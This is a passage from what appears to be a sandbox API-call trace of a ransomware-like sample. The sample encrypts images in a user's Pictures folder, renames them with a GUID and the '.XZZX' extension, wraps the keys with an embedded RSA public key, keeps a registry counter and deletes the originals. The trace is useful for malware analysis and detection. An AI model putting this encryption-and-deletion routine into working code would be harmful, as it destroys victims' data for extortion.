dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc504 [0123.833] SetErrorMode (uMode=0x1) returned 0x1 [0123.833] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0123.833] OutputDebugStringW (lpOutputString="end") [0123.834] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0123.834] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0123.834] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3ce25b0) returned 1 [0123.834] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce25b0, dwCertEncodingType=0x1, pInfo=0x3cb22c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb22f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb2300*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cdda98) returned 1 [0123.834] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.835] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0123.835] CryptEncrypt (in: hKey=0x3cdda98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0123.835] CryptEncrypt (in: hKey=0x3cdda98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce2638*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce2638*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0123.835] WriteFile (in: hFile=0x5c4, lpBuffer=0x3ce2638*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce2638*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0123.835] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0123.835] WriteFile (in: hFile=0x5c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0123.835] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0123.836] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0123.836] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x5cc) returned 0x0 [0123.836] RegQueryValueExW (in: hKey=0x5cc, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x8c, lpcbData=0x434dfdc*=0x4) returned 0x0 [0123.836] RegCloseKey (hKey=0x5cc) returned 0x0 [0123.836] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x5cc) returned 0x0 [0123.836] RegSetValueExW (in: hKey=0x5cc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x8d, cbData=0x4 | out: lpData=0x434dfec*=0x8d) returned 0x0 [0123.836] RegCloseKey (hKey=0x5cc) returned 0x0 [0123.836] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.837] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.837] CloseHandle (hObject=0x5c4) returned 1 [0123.840] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0123.841] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0123.841] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E mrX_4M3P5jMLSuXG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e mrx_4m3p5jmlsuxg.bmp")) returned 1 [0123.844] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E mrX_4M3P5jMLSuXG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e mrx_4m3p5jmlsuxg.bmp")) returned 0 Thread: id = 405 os_tid = 0x964 [0123.842] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0123.842] lstrcpyW (in: lpString1=0x420f460, lpString2="FFqA4 2WndIy.gif" | out: lpString1="FFqA4 2WndIy.gif") returned="FFqA4 2WndIy.gif" [0123.842] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0123.842] SetErrorMode (uMode=0x1) returned 0x1 [0123.842] lstrcpyW (in: lpString1=0x420f860, lpString2="FFqA4 2WndIy.gif" | out: lpString1="FFqA4 2WndIy.gif") returned="FFqA4 2WndIy.gif" [0123.842] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xf759aee9, Data2=0xe9e, Data3=0x433a, Data4=([0]=0xb0, [1]=0x5c, [2]=0xd7, [3]=0x3d, [4]=0xd9, [5]=0xe7, [6]=0x41, [7]=0xa1))) returned 0x0 [0123.842] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FFqA4 2WndIy.gif") returned 60 [0123.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0123.842] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\90EAB1CE03D6A9CCF759AEE907F78E14.XZZX") returned 80 [0123.842] StrStrW (lpFirst="FFqA4 2WndIy.gif", lpSrch="XZZX") returned 0x0 [0123.842] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FFqA4 2WndIy.gif", dwFileAttributes=0x20) returned 1 [0123.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FFqA4 2WndIy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqa4 2wndiy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5dc [0123.845] ReadFile (in: hFile=0x5dc, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0x7910, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x420e418*=0x7910, lpOverlapped=0x0) returned 1 [0123.846] CloseHandle (hObject=0x5dc) returned 1 [0123.846] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0123.846] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0123.847] SetErrorMode (uMode=0x1) returned 0x1 [0123.847] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0123.847] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce26c0) returned 1 [0123.850] CryptGenKey (in: hProv=0x3ce26c0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cdda18) returned 1 [0124.104] CryptExportKey (in: hKey=0x3cdda18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0124.104] CryptExportKey (in: hKey=0x3cdda18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x420e41c | out: pbData=0x40a0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0124.105] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0124.106] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0124.106] CryptDestroyKey (hKey=0x3cdda18) returned 1 [0124.106] CryptReleaseContext (hProv=0x3ce2748, dwFlags=0x0) returned 0 [0124.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\90eab1ce03d6a9ccf759aee907f78e14.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0124.106] WriteFile (in: hFile=0x5cc, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0x7910, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x420e438*=0x7910, lpOverlapped=0x0) returned 1 [0124.107] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7910 [0124.107] WriteFile (in: hFile=0x5cc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0124.108] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7915 [0124.108] WriteFile (in: hFile=0x5cc, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x22, lpOverlapped=0x0) returned 1 [0124.108] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7937 [0124.108] WriteFile (in: hFile=0x5cc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0124.108] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x793c [0124.108] SetErrorMode (uMode=0x1) returned 0x1 [0124.108] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0124.108] OutputDebugStringW (lpOutputString="end") [0124.108] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0124.108] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0124.108] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3ce27d0) returned 1 [0124.109] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce27d0, dwCertEncodingType=0x1, pInfo=0x3d0cf98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0cfc8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0cfd0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cdda18) returned 1 [0124.109] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0124.110] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0124.110] CryptEncrypt (in: hKey=0x3cdda18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0124.110] CryptEncrypt (in: hKey=0x3cdda18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce2858*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce2858*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0124.110] WriteFile (in: hFile=0x5cc, lpBuffer=0x3ce2858*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce2858*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0124.110] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0124.110] WriteFile (in: hFile=0x5cc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0124.110] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0124.151] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0124.151] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x5ec) returned 0x0 [0124.151] RegQueryValueExW (in: hKey=0x5ec, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x8d, lpcbData=0x420dfdc*=0x4) returned 0x0 [0124.152] RegCloseKey (hKey=0x5ec) returned 0x0 [0124.152] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x5ec) returned 0x0 [0124.152] RegSetValueExW (in: hKey=0x5ec, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x8e, cbData=0x4 | out: lpData=0x420dfec*=0x8e) returned 0x0 [0124.152] RegCloseKey (hKey=0x5ec) returned 0x0 [0124.152] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.152] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.153] CloseHandle (hObject=0x5cc) returned 1 [0124.154] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0124.154] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0124.154] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FFqA4 2WndIy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqa4 2wndiy.gif")) returned 1 [0124.156] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FFqA4 2WndIy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqa4 2wndiy.gif")) returned 0 Thread: id = 406 os_tid = 0x968 [0124.026] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0124.026] lstrcpyW (in: lpString1=0x434f460, lpString2="fTtF.bmp" | out: lpString1="fTtF.bmp") returned="fTtF.bmp" [0124.026] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0124.026] SetErrorMode (uMode=0x1) returned 0x1 [0124.026] lstrcpyW (in: lpString1=0x434f860, lpString2="fTtF.bmp" | out: lpString1="fTtF.bmp") returned="fTtF.bmp" [0124.026] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x2e2e29a0, Data2=0x40b1, Data3=0x46bd, Data4=([0]=0x86, [1]=0x36, [2]=0x48, [3]=0x5b, [4]=0x11, [5]=0xc6, [6]=0x2b, [7]=0xb9))) returned 0x0 [0124.026] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fTtF.bmp") returned 51 [0124.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0124.026] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7852C7A011E028AD2E2E29A016150CF5.XZZX") returned 80 [0124.026] StrStrW (lpFirst="fTtF.bmp", lpSrch="XZZX") returned 0x0 [0124.026] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fTtF.bmp", dwFileAttributes=0x20) returned 1 [0124.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fTtF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fttf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0124.027] ReadFile (in: hFile=0x5cc, lpBuffer=0x3cf8c70, nNumberOfBytesToRead=0xb706, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf8c70*, lpNumberOfBytesRead=0x434e418*=0xb706, lpOverlapped=0x0) returned 1 [0124.029] CloseHandle (hObject=0x5cc) returned 1 [0124.029] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0124.030] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0124.030] SetErrorMode (uMode=0x1) returned 0x1 [0124.030] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0124.030] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce2748) returned 1 [0124.035] CryptGenKey (in: hProv=0x3ce2748, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cdda58) returned 1 [0124.449] CryptExportKey (in: hKey=0x3cdda58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0124.449] CryptExportKey (in: hKey=0x3cdda58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0124.449] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0124.450] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0124.450] CryptDestroyKey (hKey=0x3cdda58) returned 1 [0124.450] CryptReleaseContext (hProv=0x3ce28e0, dwFlags=0x0) returned 0 [0124.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7852C7A011E028AD2E2E29A016150CF5.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7852c7a011e028ad2e2e29a016150cf5.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f0 [0124.450] WriteFile (in: hFile=0x5f0, lpBuffer=0x3cf8c70*, nNumberOfBytesToWrite=0xb706, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf8c70*, lpNumberOfBytesWritten=0x434e438*=0xb706, lpOverlapped=0x0) returned 1 [0124.451] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb706 [0124.451] WriteFile (in: hFile=0x5f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0124.452] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb70b [0124.452] WriteFile (in: hFile=0x5f0, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x10, lpOverlapped=0x0) returned 1 [0124.452] SetFilePointer (in: hFile=0x5f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb71b [0124.452] WriteFile (in: hFile=0x5f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0124.452] SetFilePointer (in: 